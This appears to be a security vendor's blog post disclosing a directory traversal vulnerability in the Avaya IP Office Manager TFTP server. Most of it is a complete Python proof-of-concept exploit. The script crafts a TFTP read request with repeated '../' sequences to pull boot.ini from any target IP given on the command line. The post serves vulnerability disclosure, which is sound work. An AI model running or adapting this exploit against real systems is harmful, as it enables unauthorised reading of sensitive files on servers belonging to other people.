Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability

  • Post author:
  • Reading time:2 mins read

SecPod Research Team member (Veerendra G.G) has found a Directory Traversal Vulnerability in Avaya IP Office Manager TFTP Server. The vulnerability is caused due to improper validation of TFTP READ requests containing ‘../’ sequences, which allows attackers to read arbitrary files via directory traversal attacks and gain sensitive information. A good vulnerability management software can prevent such attacks.

POC : Download here.

Packet Capture : Download here.

More information can be found here.

#!/usr/bin/python
##############################################################################
# Exploit   : https://www.secpod.com/blog/?p=225
#             http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py
#             http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
# Tested against Avaya Office IP Manager 8.1
##############################################################################

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                  ## The Server IP
    PORT = 69                           ## Default TFTP port

    data = "\x00\x01"                   ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"    ## Read boot.ini file using directory traversal
    data += "octet\x00"             ## TFTP Type

    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestions.

Cheers!
SecPod Research Team

Share this article